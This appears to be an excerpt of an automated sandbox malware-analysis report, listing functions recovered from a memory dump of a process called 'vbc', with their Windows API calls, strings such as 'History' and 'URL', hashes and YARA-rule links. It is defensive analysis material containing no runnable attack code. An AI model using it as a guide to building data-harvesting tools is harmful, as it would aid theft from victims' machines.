                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Item$Library$AddressFreeLoadProc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2406072140-0
                                                                                                                                                                        • Opcode ID: da5f3edd2f60ef32041746d78debef195ee365f8658758de0d32d5ce3718fae6
                                                                                                                                                                        • Instruction ID: 228af19f1fcbab99cdef25afc198749965fa335a60b9bcf03d324973c33eddf9
                                                                                                                                                                        • Opcode Fuzzy Hash: da5f3edd2f60ef32041746d78debef195ee365f8658758de0d32d5ce3718fae6
                                                                                                                                                                        • Instruction Fuzzy Hash: C1F01CB54047016BDA313F72CC09D5BBAADEFC1318F020D3EB1A1661E1CBBD94428A58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040CF98 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • wcschr.MSVCRT ref: 0040CFDA
                                                                                                                                                                        • wcschr.MSVCRT ref: 0040CFE8
                                                                                                                                                                          • Part of subcall function 00408FA6: wcslen.MSVCRT ref: 00408FC2
                                                                                                                                                                          • Part of subcall function 00408FA6: memcpy.MSVCRT ref: 00408FE5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$memcpywcslen
                                                                                                                                                                        • String ID: "
                                                                                                                                                                        • API String ID: 1983396471-123907689
                                                                                                                                                                        • Opcode ID: 10fcbf9e5481758e0dfe22ca6cc4b0137c7973d9f08c313bebbe16306d28857a
                                                                                                                                                                        • Instruction ID: cb92cf76e860540842cf0149dc84745c0fdf0d5674f0ab6313b6b46cd67416c3
                                                                                                                                                                        • Opcode Fuzzy Hash: 10fcbf9e5481758e0dfe22ca6cc4b0137c7973d9f08c313bebbe16306d28857a
                                                                                                                                                                        • Instruction Fuzzy Hash: 5331B371904104EFDF10EFA5D8419EEB7B5EF44328F20416FE854B71C2DB7C9A468A58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00408BAA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpywcschr
                                                                                                                                                                        • String ID: ZD
                                                                                                                                                                        • API String ID: 2424118378-3587482827
                                                                                                                                                                        • Opcode ID: cab20acd61bf2aeda623c70c5b61bfb8dcf6f4394f0840f81abff6233d4b2f5c
                                                                                                                                                                        • Instruction ID: bc5ff3c8a32915e0c271f67cda952c5327785ed0a9ceb032124e0645629a4555
                                                                                                                                                                        • Opcode Fuzzy Hash: cab20acd61bf2aeda623c70c5b61bfb8dcf6f4394f0840f81abff6233d4b2f5c
                                                                                                                                                                        • Instruction Fuzzy Hash: 6B21D372815615AFEB259F18C6809BA73B4EB55354B10003FECC1E73D1EF78EC9186A8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040A19F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004089BB: SetFilePointer.KERNEL32(0040A46B,?,00000000,00000000,?,0040A271,00000000,00000000,?,00000020,?,0040A401,?,?,*.*,0040A46B), ref: 004089C8
                                                                                                                                                                        • _memicmp.MSVCRT ref: 0040A1B9
                                                                                                                                                                        • memcpy.MSVCRT ref: 0040A1D0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                        • String ID: URL
                                                                                                                                                                        • API String ID: 2108176848-3574463123
                                                                                                                                                                        • Opcode ID: 0ab65471aa39f3e32cca0cb723868807121227734642166b6a1d255f25c2e27e
                                                                                                                                                                        • Instruction ID: 99369b2f7b4a62638f95efb923bbf95607b210eae314fb40be60fbcdcdd136bc
                                                                                                                                                                        • Opcode Fuzzy Hash: 0ab65471aa39f3e32cca0cb723868807121227734642166b6a1d255f25c2e27e
                                                                                                                                                                        • Instruction Fuzzy Hash: 8E11E371200304BBEB11DF65CC05F5F7BA8AF91348F00407AF904AB391EA39DA20C7A6
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004089E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snwprintfmemcpy
                                                                                                                                                                        • String ID: %2.2X
                                                                                                                                                                        • API String ID: 2789212964-323797159
                                                                                                                                                                        • Opcode ID: d16808a51bbc7474834844d6a398450cf8754e6776392b16b10eb0a45586ee87
                                                                                                                                                                        • Instruction ID: da81b6977c0b6fb050ee50f61be4767a81b1db5370a865e3ffb8ab5306406039
                                                                                                                                                                        • Opcode Fuzzy Hash: d16808a51bbc7474834844d6a398450cf8754e6776392b16b10eb0a45586ee87
                                                                                                                                                                        • Instruction Fuzzy Hash: D311A132A00208BFEB40DFE8C986AAF73B8FB45714F10843BED55E7141D6789A558F95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004174E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,004176FC,?,00000000), ref: 00417518
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00417524
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseFileHandleUnmapView
                                                                                                                                                                        • String ID: NA
                                                                                                                                                                        • API String ID: 2381555830-2562218444
                                                                                                                                                                        • Opcode ID: d40bf1f6c7c19c9d983791adfa5e9ad4e6f6ebbcc0410757e5a5cd4d668ca904
                                                                                                                                                                        • Instruction ID: 5a1a322b0db6f4624e604a7b594929ce6c45ce98bd99ef11bc86fd7bf5bcef0d
                                                                                                                                                                        • Opcode Fuzzy Hash: d40bf1f6c7c19c9d983791adfa5e9ad4e6f6ebbcc0410757e5a5cd4d668ca904
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D11BF36504B10EFC7329F28D944A9777F5FF40752B40092EE94296A61D738F981CB58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040AE5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0040AE7C
                                                                                                                                                                          • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                          • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                          • Part of subcall function 00409064: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401DEE,00000000,00000001,00000000), ref: 0040907D
                                                                                                                                                                          • Part of subcall function 00409064: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401DEE,00000000,00000001,00000000), ref: 004090A2
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,000000FF,00000000), ref: 0040AECC
                                                                                                                                                                          • Part of subcall function 00409552: ??3@YAXPAX@Z.MSVCRT ref: 00409559
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                        • String ID: {@
                                                                                                                                                                        • API String ID: 2445788494-1579578673
                                                                                                                                                                        • Opcode ID: c255d9c27d1defa37b3e30fcff96da51efc1fad4c64b69bf173537adafc66d1e
                                                                                                                                                                        • Instruction ID: c5e992bc26eaba96ccce0a59eaf6c8ec24c3530ff69697df2342695e73c728e4
                                                                                                                                                                        • Opcode Fuzzy Hash: c255d9c27d1defa37b3e30fcff96da51efc1fad4c64b69bf173537adafc66d1e
                                                                                                                                                                        • Instruction Fuzzy Hash: A1113376804208AFCB01AF69DC45CDA7B78EE05364751C27BF515A7192D6349E04CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040D1F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snwprintf
                                                                                                                                                                        • String ID: %%-%d.%ds
                                                                                                                                                                        • API String ID: 3988819677-2008345750
                                                                                                                                                                        • Opcode ID: 483dcaac6a08b5d03ce4074c4c19aa481c1388c04e02163b2fa0e4fc7d7ec376
                                                                                                                                                                        • Instruction ID: fa2a5c48b8b1081f9110b67312fe06c807ccf1e61c825d072a06322f14435401
                                                                                                                                                                        • Opcode Fuzzy Hash: 483dcaac6a08b5d03ce4074c4c19aa481c1388c04e02163b2fa0e4fc7d7ec376
                                                                                                                                                                        • Instruction Fuzzy Hash: 2D01B171600304AFD711EF69CC82E5ABBA9FF8C714B10442EFD46A7292C679F851CB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00408907 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileNameSavewcscpy
                                                                                                                                                                        • String ID: X
                                                                                                                                                                        • API String ID: 3080202770-3081909835
                                                                                                                                                                        • Opcode ID: ebc7cc994b1ae799fe580d521e5066964324ca7fbd572096a573d52571a50e6b
                                                                                                                                                                        • Instruction ID: 302039dcaac94884f1c4397820c578514485f3c1708042d42c96f5da00a98a83
                                                                                                                                                                        • Opcode Fuzzy Hash: ebc7cc994b1ae799fe580d521e5066964324ca7fbd572096a573d52571a50e6b
                                                                                                                                                                        • Instruction Fuzzy Hash: 3301D3B1E002499FDF01DFE9D9847AEBBF4AB08319F10402EE855E6280DB789949CF55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00408FFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memicmpwcslen
                                                                                                                                                                        • String ID: History
                                                                                                                                                                        • API String ID: 1872909662-3892791767
                                                                                                                                                                        • Opcode ID: e276876a3a660070092f4bdc0da4bda60b27ab1e2c5d0f7fe8a34c2cfdf5cdf0
                                                                                                                                                                        • Instruction ID: 6d3e5e79fb5ba3dc045185e0f7d8bb4044f56437cf7f7bc11c2c4fdfd27bba80
                                                                                                                                                                        • Opcode Fuzzy Hash: e276876a3a660070092f4bdc0da4bda60b27ab1e2c5d0f7fe8a34c2cfdf5cdf0
                                                                                                                                                                        • Instruction Fuzzy Hash: D1F0A4721086019BD210EA298841A6BF7E8DB923A8F11053FF89192283DB3DDC5586A9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040BF8E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040BFA6
                                                                                                                                                                        • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040BFD5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSendmemset
                                                                                                                                                                        • String ID: "
                                                                                                                                                                        • API String ID: 568519121-123907689
                                                                                                                                                                        • Opcode ID: 8974f3925887516f6d0a900228c109d4e68bc67ff3c39d3e2085c907346f7644
                                                                                                                                                                        • Instruction ID: 52ec7358bf223f21f0f54ed804b07356b6d9a4f052c0f3137058475af9765f6b
                                                                                                                                                                        • Opcode Fuzzy Hash: 8974f3925887516f6d0a900228c109d4e68bc67ff3c39d3e2085c907346f7644
                                                                                                                                                                        • Instruction Fuzzy Hash: 66016D75900206ABDB209F5ACC45EAFB7F8FF85745F00802AE855E7281E7349945CF79
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004018F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetWindowPlacement.USER32(?,?,?,?,?,0040F3B0,?,General,?,?,?,?,?,00000000,00000001), ref: 0040191D
                                                                                                                                                                        • memset.MSVCRT ref: 00401930
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PlacementWindowmemset
                                                                                                                                                                        • String ID: WinPos
                                                                                                                                                                        • API String ID: 4036792311-2823255486
                                                                                                                                                                        • Opcode ID: 531d41ac9e6cbf47dd5b0ef28c7d94a06efd8350b381f438b609c2e10ada3800
                                                                                                                                                                        • Instruction ID: ca976ba5ed3f83ef93de4c78b9b818d0dc8f3eea61e23acacabb71661926745e
                                                                                                                                                                        • Opcode Fuzzy Hash: 531d41ac9e6cbf47dd5b0ef28c7d94a06efd8350b381f438b609c2e10ada3800
                                                                                                                                                                        • Instruction Fuzzy Hash: 9AF012B0600205EFEB14DF95D899F5A77A8EF04700F54017AF90ADB2D1DBB89900CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040BC29 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040BC4D
                                                                                                                                                                        • LoadStringW.USER32(X1E,00000000,?,00001000), ref: 0040BC65
                                                                                                                                                                          • Part of subcall function 0040B93B: memset.MSVCRT ref: 0040B94E
                                                                                                                                                                          • Part of subcall function 0040B93B: _itow.MSVCRT ref: 0040B95C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$LoadString_itow
                                                                                                                                                                        • String ID: X1E
                                                                                                                                                                        • API String ID: 2363904170-1560614071
                                                                                                                                                                        • Opcode ID: 7f112a53103efb0d1130b80e122edadfff3b355a72e37d03c438b452bd6af500
                                                                                                                                                                        • Instruction ID: f380a03a7eecdd41986674abf89776040d4e37bafc66abb46cfa381fa5204df8
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f112a53103efb0d1130b80e122edadfff3b355a72e37d03c438b452bd6af500
                                                                                                                                                                        • Instruction Fuzzy Hash: 71F082729013286AF720AB459D4AFDB776CDF05744F00007ABB08E5192DB349A40C7ED
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040B93B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040B94E
                                                                                                                                                                        • _itow.MSVCRT ref: 0040B95C
                                                                                                                                                                          • Part of subcall function 0040B8C2: memset.MSVCRT ref: 0040B8E7
                                                                                                                                                                          • Part of subcall function 0040B8C2: GetPrivateProfileStringW.KERNEL32 ref: 0040B90F
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$PrivateProfileString_itow
                                                                                                                                                                        • String ID: X1E
                                                                                                                                                                        • API String ID: 1482724422-1560614071
                                                                                                                                                                        • Opcode ID: 0462ac8b755d67dc9dd51470dc6d3f017a83e147eaeea5c62657f161a75d20dc
                                                                                                                                                                        • Instruction ID: c527bd8864a1e8dc9924cbacd4c6e7ae812da0d58d0774c54ed9ac8dc2116314
                                                                                                                                                                        • Opcode Fuzzy Hash: 0462ac8b755d67dc9dd51470dc6d3f017a83e147eaeea5c62657f161a75d20dc
                                                                                                                                                                        • Instruction Fuzzy Hash: EDE0BFB294021CB6EF11BFA1CC46F9D77ACBB14748F004025FA05A51D1E7B8E6598759
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040BE89 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D
                                                                                                                                                                        • wcsrchr.MSVCRT ref: 0040BE92
                                                                                                                                                                        • wcscat.MSVCRT ref: 0040BEA8
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                        • String ID: _lng.ini
                                                                                                                                                                        • API String ID: 383090722-1948609170
                                                                                                                                                                        • Opcode ID: 85d76508d49b0ff6757e45e150b40472edf209ff8ddcdf29665fd620b319a214
                                                                                                                                                                        • Instruction ID: 84d8fe8025816c60ed5f34aa0efad718bb16e503e766276e22ad5a10aaf03d01
                                                                                                                                                                        • Opcode Fuzzy Hash: 85d76508d49b0ff6757e45e150b40472edf209ff8ddcdf29665fd620b319a214
                                                                                                                                                                        • Instruction Fuzzy Hash: EDC01262586A20A4F622B622AE03B8A02888F52308F25006FFD00341C2EFAC561180EE
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0042B269 Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 438689982-0
                                                                                                                                                                        • Opcode ID: 98f9746c95fe9bc841d46f0a022c208982e5f612c2d80e193317f2d03ab29597
                                                                                                                                                                        • Instruction ID: 5583aac8f3c8c6829f169dedbb5c7f3bc80267d871db847419cec400d03eb5c0
                                                                                                                                                                        • Opcode Fuzzy Hash: 98f9746c95fe9bc841d46f0a022c208982e5f612c2d80e193317f2d03ab29597
                                                                                                                                                                        • Instruction Fuzzy Hash: A551B375A00215EBDF14DF55D882BAEBB75FF04340F54805AED04A6252E7789E50CBE8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040C05B Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@$memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1860491036-0
                                                                                                                                                                        • Opcode ID: 852de0583aef39f36375dc552f64b502989e158c2a9e6a9d74aa6e27cfe29003
                                                                                                                                                                        • Instruction ID: 98264c0c01cbe32efcdb0ac77575e239005db210b2699cda7c9871cbaaee01ad
                                                                                                                                                                        • Opcode Fuzzy Hash: 852de0583aef39f36375dc552f64b502989e158c2a9e6a9d74aa6e27cfe29003
                                                                                                                                                                        • Instruction Fuzzy Hash: 4B21B5B0A11700CFD7518F6A8485A16FAE8FF95310B26C9AFD159DB6B2D7B8C440CF14
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00408DC5 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • wcslen.MSVCRT ref: 00408DD7
                                                                                                                                                                          • Part of subcall function 004080AC: malloc.MSVCRT ref: 004080C8
                                                                                                                                                                          • Part of subcall function 004080AC: memcpy.MSVCRT ref: 004080E0
                                                                                                                                                                          • Part of subcall function 004080AC: free.MSVCRT(00000000,00000000,?,00408F0C,00000002,?,00000000,?,0040923F,00000000,?,00000000), ref: 004080E9
                                                                                                                                                                        • free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408DFD
                                                                                                                                                                        • free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408E20
                                                                                                                                                                        • memcpy.MSVCRT ref: 00408E44
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 726966127-0
                                                                                                                                                                        • Opcode ID: 39603b6d7359158d33076ec7bab952e59b6d37e46f731a650a7499c7d7739eb1
                                                                                                                                                                        • Instruction ID: da9404a03362d95f45f68813529404a67aab342ff110b4c830d245a8fa10e0ef
                                                                                                                                                                        • Opcode Fuzzy Hash: 39603b6d7359158d33076ec7bab952e59b6d37e46f731a650a7499c7d7739eb1
                                                                                                                                                                        • Instruction Fuzzy Hash: 7B214F71100604EFD730DF18D98199AB3F5FF853247118A2EF8A69B6E1CB39A915CB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00416CFF Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00417A93,000000FF,00000000,00000000,0041767E,?,?,0041767E,00417A93,00000000,?,00417D00,?,00000000), ref: 00416D1A
                                                                                                                                                                        • malloc.MSVCRT ref: 00416D22
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00417A93,000000FF,00000000,00000000,?,0041767E,00417A93,00000000,?,00417D00,?,00000000,00000000,?), ref: 00416D39
                                                                                                                                                                        • free.MSVCRT(00000000,?,0041767E,00417A93,00000000,?,00417D00,?,00000000,00000000,?), ref: 00416D40
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2605342592-0
                                                                                                                                                                        • Opcode ID: b607c71614b1ca8bec50a9c51f152560627b91c66ff5640af174e5643dcff5fd
                                                                                                                                                                        • Instruction ID: b9117e17fd0dd3e97e5004a4b09ed95055046f94a1a1b3665f6ad504cf0e37ce
                                                                                                                                                                        • Opcode Fuzzy Hash: b607c71614b1ca8bec50a9c51f152560627b91c66ff5640af174e5643dcff5fd
